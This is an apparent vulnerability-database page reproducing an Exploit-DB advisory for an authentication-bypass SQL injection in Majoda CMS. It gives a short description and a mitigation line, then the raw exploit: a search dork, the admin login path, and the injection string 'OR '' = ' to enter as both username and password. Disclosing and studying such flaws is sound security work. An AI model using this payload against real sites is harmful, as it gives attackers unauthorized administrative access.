Majoda CMS (Auth Bypass) SQL Injection Vulnerability

vendor:

Majoda CMS

by:

Phenom

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: Majoda CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Majoda CMS (Auth Bypass) SQL Injection Vulnerability

Majoda CMS is vulnerable to an authentication bypass vulnerability due to improper sanitization of user-supplied input. An attacker can exploit this vulnerability by supplying a specially crafted username and password to the login page. This will allow the attacker to bypass authentication and gain access to the administrative panel.

Mitigation:

The vendor should ensure that user-supplied input is properly sanitized and validated before being used in authentication.

Source

Exploit-DB raw data:

------------------------------------------------------
------------------------------------------------------

 _____  _                                
|  __ \| |                               
| |__) | |__   ___ _ __   ___  _ __ ___  
|  ___/| '_ \ / _ \ '_ \ / _/\| '_ ` _ \              
| |    | | | |  __/ | | | (_) | | | | | |             
|_|    |_| |_|\___|_| |_|\/__/|_| |_| |_|             

                                                      
------------------------------------------------------
------------------------------------------------------

############### Majoda CMS (Auth Bypass) SQL Injection Vulnerability ##########################
#
#       Author : Phenom
#       
#       mail : sys.phenom.sys[at]gmail[dot]com
#
#       Dork : Majoda CMS
#
################################################################################################

####### Exploit ################################################################################
#
#      http://site/admin/index.asp
# 
#      Användarnamn(Username) : 'OR '' = '
#      Lösenord(password)     : 'OR '' = '
#
################################################################################################